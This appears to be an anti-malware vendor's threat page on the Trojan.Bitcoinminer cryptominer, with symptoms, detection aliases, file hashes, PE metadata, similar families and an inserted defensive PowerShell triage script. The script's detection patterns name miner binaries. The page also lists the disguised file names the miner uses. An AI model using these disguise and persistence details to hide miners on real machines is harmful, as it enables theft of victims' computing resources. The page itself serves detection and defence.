Trojan.Bitcoinminer

By GoldSparrow in Trojans

Threat Scorecard

Popularity Rank: 93
Threat Level: 80 % (High)
Infected Computers: 1,596,489
First Seen: May 18, 2012
Last Seen: April 3, 2026
OS(es) Affected: Windows

Trojan.Bitcoinminer is one of the detection names associated with an executable file named 'indexer.exe' that is used to mine Bitcoins and Feathercoins. Trojan.Bitcoinminer is installed in a hidden directory inside the AppData directory on the infected computer and mines Bitcoins using the infected computer's resources. Cryptocurrency mining can be extremely demanding on a computer's resources, making it overheat, perform poorly and consume more power. While Bitcoin mining is a legitimate activity, Trojan.Bitcoinminer is used by con artists to take advantage of a victim's computer to mine Bitcoins or another cryptocurrency, keeping the profits generated at the expense of the victim's computer. While mining Bitcoins with a single computer is rarely profitable, the people who distribute Trojan.Bitcoinminer and similar Trojans take advantage of the combined resources of numerous infected computers and keep the proceeds. Many Trojan.Bitcoinminer infections have currently been spotted in Russia, Ukraine and Indonesia.

How Trojan.Bitcoinminer may be Delivered

The most common way for Trojan.Bitcoinminer to enter a computer is through fake software downloads and updates. Con artists may hide threats like Trojan.Bitcoinminer inside software and media files distributed online. Victims download them from shady websites and then install Trojan.Bitcoinminer on their computers without being aware of it. Trojan.Bitcoinminer does not alert victims that their computers are infected, for example with a notification, and does not interfere with them in any visible way. However, Trojan.Bitcoinminer uses more than three-quarters of the infected computer's processing power to mine cryptocurrency. Victims of the Trojan.Bitcoinminer attack will therefore notice that their computers run extremely slowly and frequently become unresponsive or unstable. Additionally, it is not uncommon for threats like Trojan.Bitcoinminer to conflict with other software on the victim's computer, causing various performance issues and preventing that software from functioning properly.

The Trojan.Bitcoinminer Infection and Its Related Symptoms

Several symptoms may indicate that your computer has been infected with Trojan.Bitcoinminer. Computer users have reported that most software, including email clients, becomes unresponsive, freezes or crashes frequently. Some software, especially Internet browsers, fails to open at all, and many files fail to load. When victims attempt to use the infected computer to watch a video or listen to music, playback frequently stutters, is distorted or stops altogether, so the computer is not usable for the task. One typical problem associated with Trojan.Bitcoinminer occurs when typing: computer users may notice a delay in their keyboard input, especially in word processing programs. This indicates that a large portion of the infected computer's resources is being used. These symptoms can also occur legitimately when a program that needs a lot of resources is running (for example, when rendering a high-quality video). In this case, however, it is Trojan.Bitcoinminer that is using up the system's resources to mine cryptocurrency.

General Recommendations Related to Trojan.Bitcoinminer

Victims of Trojan.Bitcoinminer may notice 'indexer.exe' listed in the Task Manager. This is almost always an indicator of a Trojan.Bitcoinminer infection and requires action from the computer user. However, 'indexer.exe' is not the only name used by this BitCoin miner. PC security researchers advise computer users to remain vigilant, since other variants of Trojan.Bitcoinminer with different file names may appear. Malware investigators recommend that computer users use a security program to remove Trojan.Bitcoinminer and other threats. If your computer continues to show symptoms, it is important to use a different anti-virus program to ensure that the Trojan.Bitcoinminer infection or any related threat has been found (in some cases, other components may prevent its removal). The following are other names by which Trojan.Bitcoinminer may be detected:

  • PUP.Optional.Bitminer
  • RDN/Generic.dx!cxt
  • Riskware.Win32.BtcMine.cnywcu
  • Tool.BtcMine.157
  • Trojan ( 0048fd0e1 )
  • Trojan.Win32.Generic!BT
  • Trojan.Win32.S.BitMiner.932352
  • W32/Trojan.PBJZ-2853
  • Win32/BitCoinMiner.AS
  • Win32/Trojan.Multi.daf
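The following triage script is an added example and is not part of the original write-up. It turns the indicators described above (a process taking well over three-quarters of the CPU, an executable placed in a hidden or user-writable directory such as AppData, a file name such as 'indexer.exe' or one of the miner binaries listed further down) into a check of running processes, the Run keys and scheduled tasks. The CPU threshold, the name patterns and the set of suspect root directories are assumptions chosen for this example.

```powershell
# Constructed thresholds and name patterns (assumptions for this example);
# the names are taken from the file names listed in the write-up.
$CpuThreshold = 75   # the write-up says the miner takes over three-quarters of the CPU
$SuspectNames = @('indexer.exe', 'xmrig*', 'cpuminer*', 'nheqminer*',
                  'minergate*', 'nbminer*', 'NsCpuCNMiner*', 'NsGpuCNMiner*')
$SuspectRoots = @($env:APPDATA, $env:LOCALAPPDATA, $env:TEMP,
                  $env:ProgramData, $env:PUBLIC) | Where-Object { $_ }

function Test-SuspectPath {
    # True when an executable path matches the miner's placement or naming profile.
    param([string]$Path)
    if (-not $Path) { return $false }
    $leaf = Split-Path -Leaf $Path
    foreach ($pattern in $SuspectNames) { if ($leaf -like $pattern) { return $true } }
    foreach ($root in $SuspectRoots) {
        if ($Path.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)) {
            return $true
        }
    }
    # Hidden parent directory, as the write-up describes for indexer.exe under AppData.
    # Drive roots are skipped because Windows marks them Hidden+System by default.
    $dir = Split-Path -Parent $Path
    if ($dir -and $dir -notmatch '^[A-Za-z]:\\?$' -and (Test-Path -LiteralPath $dir)) {
        $attr = (Get-Item -LiteralPath $dir -Force).Attributes
        if ($attr -band [System.IO.FileAttributes]::Hidden) { return $true }
    }
    return $false
}

function Get-CommandExecutable {
    # Extract the executable from a Run-key value or task action, quoted or not.
    param([string]$CommandLine)
    $cmd = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim())
    if ($cmd -match '^"([^"]+)"') { return $Matches[1] }
    return ($cmd -split '\s+')[0]
}

function Get-MinerTriage {
    $findings = New-Object System.Collections.Generic.List[object]

    # 1. Running processes: CPU share normalised to the core count, plus path checks.
    $cores = [int]$env:NUMBER_OF_PROCESSORS
    if (-not $cores) { $cores = 1 }
    $byPid = @{}
    Get-CimInstance Win32_Process | ForEach-Object { $byPid[[string]$_.ProcessId] = $_ }
    Get-CimInstance Win32_PerfFormattedData_PerfProc_Process |
        Where-Object { $_.Name -notin @('Idle', '_Total') } |
        ForEach-Object {
            $pct  = [math]::Round($_.PercentProcessorTime / $cores, 1)
            $info = $byPid[[string]$_.IDProcess]
            $path = if ($info) { $info.ExecutablePath } else { $null }
            $bad  = Test-SuspectPath $path
            if ($pct -ge $CpuThreshold -or $bad) {
                $findings.Add([pscustomobject]@{
                    Source = 'Process'; Where = "PID $($_.IDProcess) $($_.Name)"
                    CpuPct = $pct; SuspectPath = $bad; Command = $path
                })
            }
        }

    # 2. Run keys (HKCU, HKLM and the Wow6432Node view used by 32-bit installers).
    $runKeys = @('HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
                 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
                 'HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run')
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }   # provider metadata, not a value
            $exe = Get-CommandExecutable ([string]$p.Value)
            if (Test-SuspectPath $exe) {
                $findings.Add([pscustomobject]@{
                    Source = 'RunKey'; Where = "$key\$($p.Name)"
                    CpuPct = $null; SuspectPath = $true; Command = $exe
                })
            }
        }
    }

    # 3. Scheduled tasks whose action executes from a suspect location.
    foreach ($task in Get-ScheduledTask) {
        foreach ($a in $task.Actions) {
            if ($a.CimClass.CimClassName -ne 'MSFT_TaskExecAction' -or -not $a.Execute) { continue }
            $exe = Get-CommandExecutable $a.Execute
            if (Test-SuspectPath $exe) {
                $findings.Add([pscustomobject]@{
                    Source = 'ScheduledTask'; Where = "$($task.TaskPath)$($task.TaskName)"
                    CpuPct = $null; SuspectPath = $true; Command = $exe
                })
            }
        }
    }
    return $findings
}

Get-MinerTriage | Sort-Object Source, CpuPct -Descending | Format-Table -AutoSize
```

Run it from an elevated prompt so the HKLM keys and every process are visible. Entries under the user profile are candidates, not verdicts: legitimate per-user installs (OneDrive, Teams and similar) also run from AppData, so check the signature and hash of anything flagged before removing it.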

File System Details

Trojan.Bitcoinminer may create the following file(s):

Registry Details

Trojan.Bitcoinminer may create the following registry entry or registry entries:

Directories

Trojan.Bitcoinminer may create the following directory or directories:


Analysis Report

General information

Family Name: Trojan.Bitcoinminer
Signature status: No Signature
MD5: 124ba8321e41ae30cd0b05f9ea388173
SHA1: 1fdee658736ab3b0e251202fc4d820a661302f33
SHA256: A1AF0CDC24237A8A1BADDE7AEE24E149BFD5CB6CFB491C484BB10FBB96FAB092
File Size: 445.95 KB, 445952 bytes
MD5: 7187e421b0647fc60aea472764757b84
SHA1: 2863e3cecea37397e28cc1ddff59f6d741cb9039
SHA256: 2E596F61AA262CD47E2368C5B3012DE06A6962559F5CC1B4D32747DD87804F1C
File Size: 8.70 MB, 8700416 bytes
MD5: 0bda62296156f9d8a876ef92c8936722
SHA1: d1ba1fc604181809c49bc9ea66f7774721740b7c
SHA256: E4A4B3F60EAE130F1392242ADD1050CA2252A9FF0DA32E5B9E54D192D29573DF
File Size: 3.28 MB, 3283968 bytes
MD5: 9f7096fd55a848150be7e80c799fe7e1
SHA1: 61c9e14b5ea6494445a4c5ed4114697d3d2680cb
SHA256: 17616A4EAE629B80FB5DF2CC2938216ABDD12F321F8860C22A50ACEE97084F4A
File Size: 3.18 MB, 3182080 bytes
MD5: eb8c07b804abaf9d719bbf6e9f2492f7
SHA1: 54374e4d805e552005056745211881e32fdf8671
SHA256: 43474C9AA9ACAE544EEF85CA99CFE633113433F6D1D2543D936C71C3CCBAC57D
File Size: 546.30 KB, 546304 bytes
MD5: 3588a8a6acb382b7fc4c0acc2f5e2287
SHA1: e1a8b36cae09463708ccab1fa47437bf00d29af3
SHA256: A9F166E93F40329B831BC90F038878DBCB52F8CD0FEFEB6E980455EB8D47DDE7
File Size: 3.18 MB, 3182080 bytes
MD5: 2d177a25a4e91b23b9632045cb76882b
SHA1: cb9beb5f392337a9be177b51bd4e56b8be8789e2
SHA256: 4EF642C704A71CF2CC6AC790BC2F155E86E9F182474EBCFDC827E461315AC769
File Size: 27.14 KB, 27136 bytes
MD5: 9a2c3832cf46101193be1e4b04ff0bba
SHA1: cff3b4f53201cf044bd113b842b7351b4381d6f4
SHA256: D81514DF09FBC085752BC047D8ADA7158CAD370C0BC479383C987D87D007F703
File Size: 3.18 MB, 3182080 bytes
MD5: ae2ff51148ec0977b455a08b9330a306
SHA1: e8b9657022e47a2dbdebb1178e7272c1af8cc717
SHA256: 65667D6BDEB141DF4629BAA7C71A6E91828741D10EDE7C9CC3BD9C2942B0C245
File Size: 119.81 KB, 119808 bytes
MD5: 6d3b19f2f1776619afbde5414c4a4118
SHA1: f1cf0ebfd39dec6ccd88210b2c809551417cf275
SHA256: 980C6EE89F2EC5A732D0A3059B9F5592755D8F6878E182ABDBBBB2122A5797DF
File Size: 49.15 KB, 49152 bytes
MD5: 66eca75e99241e4510a0ca9779574967
SHA1: 6b80c898960063e796db7ad3b817466e7ec66496
SHA256: D796E99F6EBAC40B7294F2DB873BBC5D9192853A01B6936EEA2F6DAE1D2226EA
File Size: 1.07 MB, 1068032 bytes
MD5: dabb3130b629a91dd156b6e3f029713e
SHA1: 91991be4d55ca2fa1c0c6122300b8240860452a8
SHA256: 0B5944D1D043D8EE79C51B0BE30021638F9A442CEF1D95F920D3D8AA6B598B4C
File Size: 1.73 MB, 1732608 bytes
MD5: 5574ce3f30cda6024aeaf179027e7d9e
SHA1: 08986e197daa0d2c2b313a4565a4d93b293745ea
SHA256: E4BEB10ADD44A55A70BFAE87D4B0268C49C1469C399901476BACF6759F292CA9
File Size: 6.39 MB, 6391296 bytes
MD5: d6ec78eeb364c9cefe2c3019d504528f
SHA1: 0346806b2fc81f9c5601247bd8e8bde54e7fc92b
SHA256: 1031109FFAFB6DB75B015F939674E4036C9592D554A2B77307A30DCD24E77A45
File Size: 275.97 KB, 275968 bytes
MD5: 1b84b73aac4053dcda6dfbd0604a95dd
SHA1: 7c02b19ec78dff3f40d7ff57721248ab9c6a0957
SHA256: 3AAA0D869A928B68A276A21810252F5A4BFD56E1820384FADE11CB3D1661A7BB
File Size: 4.26 MB, 4255232 bytes
MD5: abe5c316057e3f70b559d5d7cb81a2a0
SHA1: c3773d9cbf08ccadc8498f911473bb866018fca9
SHA256: 2F27BCC8302019CAEAA331AD64A814142B9209C5429DA2D6AB2233823459E9C8
File Size: 9.77 MB, 9765888 bytes
MD5: e074909f21c5e6145889403348057bcb
SHA1: 3e94d02c7c382e28d25929c5724276c3b8665bcc
SHA256: F51D64FE3B8BA5D1E5A947931F85DE58B8B8166F708AEF4AC0D25A5279431D22
File Size: 3.18 MB, 3182080 bytes
MD5: e07a76cc4258c6b4b3f85451ea2174d5
SHA1: 63dcce44118a89c580c8c07b8c15f71aca0eb268
SHA256: BA044225BE61597336BEBFAA7118E4D11B5CA1DC42CB8E7BFAD63C0151116F1F
File Size: 5.26 MB, 5264896 bytes
MD5: 0cf40fa71ef22e7474c97edde6a7297e
SHA1: 8bc05ff31749b91069afd2f0180939d2f4cdc76b
SHA256: 2D33850FDD573224EEABD153E38E054D4C511662DDC203A2EE5923F076B35514
File Size: 7.17 KB, 7168 bytes
MD5: 161c42eb0b8406f178b304faaf97cbf2
SHA1: b5f112eedc2bb2194f68d77ecc1f8c476529bea1
SHA256: 953A34F939F8165AF9082A9E583D6EE3E2BAE061ABFD22AFA2036232DF4311F1
File Size: 44.20 KB, 44202 bytes
MD5: d4b26b83696c62f3333119ad53696a80
SHA1: b595a6de0f6a18975b29e6f8ebe604956a173478
SHA256: 0D9FDC3349E9997DB430D4FF9B4985DD05319C4430E751D07AF3AE659C73CF51
File Size: 9.77 MB, 9772544 bytes
MD5: 82370a58cf8412fd375f5000aa74f364
SHA1: c5c0deb9b17b6d1fddc32f7551d35252d06d1938
SHA256: F74A66128E42FE54DF77372AB9A1CDDAE4E515459B441FAE11F05E61BF5A03F3
File Size: 6.52 MB, 6515712 bytes
MD5: 9a5a1e6d28031eeaa32dbfbb207a019a
SHA1: 7e02bd060d1ede2f3713ebeafc11240d50d50293
SHA256: 633034829CC54CE42119971B7300CAA820929FB1EAD6463224772C73D88F25A8
File Size: 6.46 MB, 6455808 bytes
MD5: 33256fdf77633053fb8d1b567900fe3f
SHA1: 5a4409828c62abf26b052163ff9ffcaf775a0802
SHA256: 9FFB87ADA62245EC25AF117121FE6DD189FFD42AC095061A829AD99941633256
File Size: 37.55 KB, 37546 bytes
MD5: c1ecefd73da47b4885bb1909369bc2e6
SHA1: 08ceb8c1a63cb685d18e7e287adf0b791c491702
SHA256: F3B532A2299A80F5DCDC6F92B4355636F3DA12512B4A03E64A2070DE8639582B
File Size: 574.46 KB, 574464 bytes
MD5: 98c8bf6a2bc3af173d2d9c7c88251e44
SHA1: ca62ffae0be26e9b83c2e1c0cd319e32495a5824
SHA256: 1F18B2EB89BD83C2ED8D2E36B3314310B134A10DD879A2C76D74DAB3E03D64CC
File Size: 410.62 KB, 410624 bytes
MD5: 63a77335d1f4ddd25303a7f05510869f
SHA1: db0d6b93f88104fd06e224d6b0ff08a987fa6290
SHA256: E4FA2271CDADF502AE4DAC139697DAEEAC1B7DD2FC8925105D82D3C7DC861D15
File Size: 3.52 MB, 3522560 bytes
MD5: fa8ba0caf59ae3fe4d7e606812671776
SHA1: 65b8cb3f8c47d1f863428a9da2d15ddc07f7c29c
SHA256: 5952C1E8BA448C24C23B4A5FFCC77246C803CFEFC4A58420790283B6B0C8124D
File Size: 6.43 MB, 6434304 bytes
MD5: a8b50e59b73a016535a74f3f82e003f7
SHA1: d27e9946413b7aa4dd819f1f82e020a26f4db980
SHA256: E31D3EDAD61BD98EDD08A3B237B8A67E7D2E4B363973774793137B687A5316FB
File Size: 2.32 MB, 2316240 bytes
MD5: 001c3310510c66e61adb3251ffc9ccb7
SHA1: fb0a9a4a78022eced95e951c71133274466e550d
SHA256: D838BF6412743235D4626570938652C9E40D208993F43E30DBE2A45D91BA0D1C
File Size: 7.12 MB, 7124480 bytes
MD5: e1170b46f08cf56a06ae63b61e03f906
SHA1: 3ad8b9cd3e1ff366afb7f7b77100507f2ec76653
SHA256: 0509C58DA9B26E67165869F1B72945DA74D23249BBBE2AA13F985AC2B17F9574
File Size: 5.84 MB, 5835264 bytes
MD5: 1ea00d4ee4bb78f35d10879a039c4110
SHA1: aec51583b4f4988fb444e69de024bbbc0dda8847
SHA256: 35E4C083AE83EEE855E4F7AF6A3FDDADEE38C9C3A1A6F6EFF02E2BC0A058EC64
File Size: 6.52 MB, 6517760 bytes
MD5: f69d76fc5484443a3b29aced8b290096
SHA1: c42fbb70d5fd1006931c6c9c628fbd21f1181d5f
SHA256: A2341D95CA60CCC77B9FD6EB2BD85B2C221076E360ED45986F08ADF20FDB0442
File Size: 9.77 MB, 9774080 bytes
MD5: 527a14b23db646e3345c66469af63e7c
SHA1: 3594fcdf01614c5eef1ba039022019358f95a9d3
SHA256: E3FD9B702635FDDA34E31921168A1793E4E2D121799AF7A9DDFBA0106F4FCF79
File Size: 9.77 MB, 9772544 bytes
MD5: d55877f44cd3a93f7f31a5437a615f6e
SHA1: 687076e47a39abd783ba575f5356baefd18ab970
SHA256: 6FA80698D7268F6E88AA88C06FB27EE99E1BCEE747C2E76911E6206A5B1AEEB3
File Size: 6.46 MB, 6464512 bytes

Windows Portable Executable Attributes

  • File doesn't have "Rich" header
  • File doesn't have debug information
  • File doesn't have exports table
  • File doesn't have relocations information
  • File doesn't have resources
  • File doesn't have security information
  • File has been packed
  • File has exports table
  • File has TLS information
  • File is .NET application
  • File is 32-bit executable
  • File is 64-bit executable
  • File is console application (IMAGE_SUBSYSTEM_WINDOWS_CUI)
  • File is either console or GUI application
  • File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
  • File is Native application (NOT .NET application)
  • File is not packed
  • IMAGE_FILE_DLL is not set inside PE header (Executable)
  • IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

Windows PE Version Information

Name Value
Assembly Version
  • 6.2.19041.6033
  • 1.0.0.1
  • 1.0.0.0
  • 0.8.1.0
  • 0.0.0.0
Comments
  • 2
  • Adds Upgrades to be bought via the Terminal
  • Flavor=Retail
  • Shell Infrastructure Host
  • This installation was built with Inno Setup.
  • This is a shim that points to a particular file. It was generated by ShimGen (Shim Generator). The use of shimgen must comply with its proprietary license.
Company Name
  • 3
  • Common Softwares
  • Computta.com
  • Cowan Innovations Inc.
  • EnhancedEnterprises
  • Gunther-Gerben Boxhammer
  • Microsoft Corporation
  • Native System Provider
  • Omniscye
  • RealDimensions Software, LLC
  • sharkbot
  • The Monero Developer Community
  • www.hola..com
  • www.microsoft.com
  • www.truemining.online
  • www.xmrig.com
File Description
  • .NET Runtime Optimization Service
  • 1
  • Altruistics Uninstaller
  • Antimalware Core Service
  • Computta
  • CPVisual
  • EmpressMinecraft
  • EnhancedEnterprises
  • Gunther-Gerben Boxhammer Launcher
  • Hola Update
  • Host Process for Windows Services
  • icl
  • Internet Explorer
  • KPGminer
  • Microsoft Windows Networking Sevrices
  • OOBE Network Connection Flow
  • Runtime Broker
  • Setup/Uninstall
  • sharkbot
  • Shell Infrastructure Host
  • ShimGen generated shim - shim
  • svchost.exe
  • This installer database contains the logic and data required to install NativeServicesProvider.
  • Windows Desktop Manager
  • winrar-x64-591 Installer
  • XMRig miner
  • XMRig ZeroFee by True Mining
File Version
  • 51.1052.0.0
  • 10.0.26100.7019 (WinBuild.160101.0800)
  • 10.0.26100.5074 (WinBuild.160101.0800)
  • 10.0.19041.5198
  • 10.0.19041.746
  • 6.31.6.0
  • 6.26.0
  • 6.25.0
  • 6.22.2-zerofee
  • 6.22.2
  • 6.21.1
  • 6.2.19041.6033
  • 4.18.25100.9008 (b0af8b174efae63a7a64d96131727074dad31379)
  • 4.8.9065.0 built by: NET481REL1LAST_C
  • 2.5.2
  • 2.1.0
  • 2, 0, 0, 0
  • 2
  • 1.30
  • 1.6.0.1
  • 1.0.1
  • 1.0.0.1
  • 1.0.0.0
  • 0.89
  • 0.8.1.0
  • 0.0.0.0
Internal Name
  • Altruistics Uninstaller
  • Assembly-CSharp.dll
  • Computta
  • CPVisual.exe
  • DriverVideo.exe
  • EmpressMinecraft.dll
  • EnhancedEnterprises.dll
  • ethminer.exe
  • free hydra.exe
  • Game Launcher
  • Guim.exe
  • HdcksMen.exe
  • hydra free.exe
  • icl.exe
  • KPGminer.exe
  • max-watchdog.exe
  • MpDefenderCoreService.exe
  • mscorsvc.exe
  • NativeServicesProvider
  • okay.exe
  • Pegasus icarus Hvnc.exe
  • RuntimeBroker.exe
  • sharkbot.dll
  • svchost.exe
  • twitchbot.exe
  • updater-checker.exe
  • Updater.exe
  • ValoLoader.exe
  • winrar-x64-591
  • XENO EMULATOR BYPASS.exe
Legal Copyright
  • 5
  • Computta.com
  • Copyright (C) 2016-2023 microsoft.com
  • Copyright (C) 2016-2024
  • Copyright (C) 2016-2024 xmrig.com
  • Copyright (C) 2016-2024 xmrig.com | Copyright (C) 2021-2025 True Mining
  • Copyright (C) 2016-2025 hola..com
  • Copyright (C) 2016-2025 Networking Sevrices
  • Copyright (C) 2016-2025 xmrig.com
  • Copyright (C) 2016-2026 xmrig.com
  • Copyright (C) 2018 Native System Provider
  • Copyright (C) 2018- Gunther-Gerben Boxhammer
  • Copyright (C) 2021 Common Softwares
  • Copyright (C) Microsoft Corporation.
  • Copyright (C) Microsoft Corporation. All rights reserved.
  • Copyright © 2013 - 2017 RealDimensions Software, LLC
  • Copyright © 2018
  • Copyright © 2022
  • Cowan Innovations Inc. © 2022
  • © Microsoft Corporation. All rights reserved.
  • © Microsoft Corporation. All rights reserved.
  • © Microsoft Corporation. All Rights Reserved.
Legal Trademarks
  • 6
Original File Name
  • NativeServicesProvider.exe
  • winrar-x64-591.exe
Original Filename
  • Altruistics Uninstaller
  • Assembly-CSharp.dll
  • CPVisual.exe
  • DriverVideo.exe
  • EmpressMinecraft.dll
  • EnhancedEnterprises.dll
  • ethminer.exe
  • free hydra.exe
  • GGBH.exe
  • Guim.exe
  • HdcksMen.exe
  • hola..exe
  • hydra free.exe
  • icl.exe
  • KPGminer.exe
  • max-watchdog.exe
  • MpDefenderCoreService.exe
  • mscorsvc.exe
  • msedgeview3.exe
  • okay.exe
  • Pegasus icarus Hvnc.exe
  • RuntimeBroker.exe
  • sharkbot.dll
  • svchost.exe
  • twitchbot.exe
  • uninstall.exe
  • updater-checker.exe
  • Updater.exe
  • ValoLoader.exe
  • Windows Networking Sevrices.exe
  • WMD.EXE
  • wmsearch.exe
  • XENO EMULATOR BYPASS.exe
  • xmrig.exe
Private Build
  • DDBLD356B
Product Name
  • 4
  • Altruistics
  • Computta Деинсталлятор
  • CPVisual
  • EmpressMinecraft
  • EnhancedEnterprises
  • Explorer
  • GGBH Launcher
  • Hola
  • icl
  • KPGminer
  • Microsoft® .NET Framework
  • Microsoft® Windows® Operating System
  • Monero GUI Wallet
  • NativeServicesProvider
  • sharkbot
  • ShimGen generated shim
  • svchost.exe
  • Windows Networking Sevrices
  • winhttp
  • winrar-x64-591
  • WMD
  • wmsearch
  • XMRig
  • XMRig Zerofee
Product Version
  • 10.0.26100.7019
  • 10.0.26100.5074
  • 10.0.19041.746
  • 10.0.18041
  • 6.31.6.0
  • 6.26.0
  • 6.25.0
  • 6.22.2-zerofee
  • 6.22.2
  • 6.21.1
  • 6.2.19041.6033
  • 4.18.25100.9008
  • 4.8.9065.0
  • 2.5.2
  • 2.1.0
  • 2, 0, 0, 0
  • 2
  • 1.30
  • 1.6.0.1
  • 1.0.1
  • 1.0.0.1
  • 1.0.0.0
  • 1.0.0+8df7888a094264c71862434302af4d2ea413a747
  • 1.0.0+8d0131e98690c8e8725040a073b49b40f14c4711
  • 1.0.0
  • 0.89
  • 0.18.4.5
  • 0.18.4.4
  • 0.18.4.3
  • 0.18.4.2
  • 0.8.1
  • 0.0.0.0

Digital Signatures

Signer | Root | Status
16QP LIMITED | COMODO RSA Code Signing CA | Self Signed
Jetstar Media LTD | COMODO RSA Code Signing CA | Self Signed
Contagious Computing Complex | Contagious Computing Complex | Self Signed
www.freesharesoft.com | www.freesharesoft.com | Self Signed

File Traits

  • .NET
  • 2+ executable sections
  • big overlay
  • dll
  • fptable
  • GetConsoleWindow
  • golang
  • HighEntropy
  • Inno
  • InnoSetup Installer
  • Installer Manifest
  • Installer Version
  • NewLateBinding
  • No Version Info
  • ntdll
  • packed
  • RAR (In Overlay)
  • RijndaelManaged
  • Run
  • VirtualQueryEx
  • WRARSFX
  • WriteProcessMemory
  • x64
  • x86

Block Information

Total Blocks: 17,230
Potentially Malicious Blocks: 653
Whitelisted Blocks: 13,947
Unknown Blocks: 2,630

Visual Map

[Visual map omitted: a per-block grid of 0 / ? / x classifications, truncated on the original page]
0 - Probable Safe Block
? - Unknown Block
x - Potentially Malicious Block

Similar Families

  • Agent.FDD
  • Agent.GOG
  • Agent.LPAA
  • Agent.LPQ
  • Agent.TKM
  • BadIIS.GA
  • Bitcoinminer.CBA
  • Bitcoinminer.E
  • Bitcoinminer.H
  • Bitcoinminer.KC
  • Bitcoinminer.L
  • Bitcoinminer.LC
  • BypassUAC.HA
  • ClipBanker.HJA
  • ClipBanker.IF
  • Coinminer.AHC
  • Coinminer.GCJ
  • Coinminer.RB
  • DiscordStealer.DB
  • Downloader.GDG
  • Downloader.GDH
  • Dropper.Agent.GD
  • Gamehack.EBF
  • Gamehack.GSI
  • Injector.AK
  • Injector.DRC
  • Injector.DRD
  • Keylogger.GDC
  • Keylogger.RA
  • Kryptik.XXBA
  • Kryptik.XXBF
  • Lumma.GFD
  • MSIL.Agent.KAB
  • MSIL.Agent.XO
  • MSIL.AgentTesla.AH
  • MSIL.Cerbu.C
  • MSIL.Coinminer.XA
  • MSIL.Dropper.X
  • MSIL.Dropper.XF
  • MSIL.Heracles.IO
  • MSIL.Inject.AAI
  • MSIL.Inject.AB
  • MSIL.Inject.YT
  • MSIL.Injector.XT
  • MSIL.Krypt.GEBU
  • MSIL.Krypt.SEA
  • MSIL.Krypt.U
  • MSIL.Krypt.YAGO
  • MSIL.Krypt.YAGR
  • MSIL.Krypt.YAGT
  • MSIL.Kryptik.XC
  • MSIL.Kryptik.XE
  • MSIL.Spy.Agent.XF
  • MSIL.Spy.Agent.XG
  • Pinggy.A
  • Rugmi.IA
  • ShellcodeRunner.YD
  • Sheloader.A
  • Sheloader.C
  • Stealer.IFA
  • Stealer.KF
  • SteamStealer.C
  • Trickbot.AJ
  • Trojan.Agent.Gen.BL
  • Trojan.Agent.Gen.FN
  • Trojan.Agent.Gen.NA
  • Trojan.ReverseShell.Gen.AW
  • Trojan.ShellcodeRunner.Gen.KC
  • Wdfload.A

Files Modified

File Attributes
\device\namedpipe Generic Read,Write Attributes
\device\namedpipe Generic Write,Read Attributes
\device\namedpipe\dav rpc service Generic Read,Write Data,Write Attributes,Write extended,Append data
\device\namedpipe\gmdasllogger Generic Write,Read Attributes
\device\namedpipe\pshost.133976748101365294.6008.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134125939623293346.7060.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134180993952178115.516.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\toserveradvinst_estimate_c:\users\user\downloads\5597c10b0b2d85c5f193a989fa677823773a4eb0_0004143472 Generic Read,Write Data,Write Attributes,Write extended,Append data
\device\namedpipe\toserveradvinst_estimate_c:\users\user\downloads\d27e9946413b7aa4dd819f1f82e020a26f4db980_0002316240 Generic Read,Write Data,Write Attributes,Write extended,Append data
\device\namedpipe\toserveradvinst_extract_c:\users\user\downloads\5597c10b0b2d85c5f193a989fa677823773a4eb0_0004143472 Generic Read,Write Data,Write Attributes,Write extended,Append data
\device\namedpipe\toserveradvinst_extract_c:\users\user\downloads\b148e3b44ef9d1239622ce4041f467dacf2aec9c_0003532648 Generic Read,Write Data,Write Attributes,Write extended,Append data
\device\namedpipe\toserveradvinst_extract_c:\users\user\downloads\d27e9946413b7aa4dd819f1f82e020a26f4db980_0002316240 Generic Read,Write Data,Write Attributes,Write extended,Append data
\device\namedpipe\wkssvc Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\program files\hola\app\holamonitorservice.exe Generic Write,Read Attributes
c:\programdata\free hydra.exe Generic Write,Read Attributes
c:\users\user\appdata\local\microsoft\windows\usrclass.dat{dba6b5ef-640a-11ed-9bcb-f677369d361c}.txr.0.regtrans-ms Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\microsoft\windows\usrclass.dat{dba6b5ef-640a-11ed-9bcb-f677369d361c}.txr.1.regtrans-ms Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\microsoft\windows\usrclass.dat{dba6b5ef-640a-11ed-9bcb-f677369d361c}.txr.2.regtrans-ms Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\__psscriptpolicytest_2qfuc11v.n40.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_cs0icwc3.bdn.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_hi4hjy5y.tju.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_kise41dq.atn.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_kiwtn0sh.3nf.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_n3lf2rfk.g0m.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\aieadaf.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\aieadaf.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete,LEFT 262144
c:\users\user\appdata\local\temp\aieadaf.tmp Synchronize,Write Attributes
c:\users\user\appdata\local\temp\build.exe Generic Write,Read Attributes
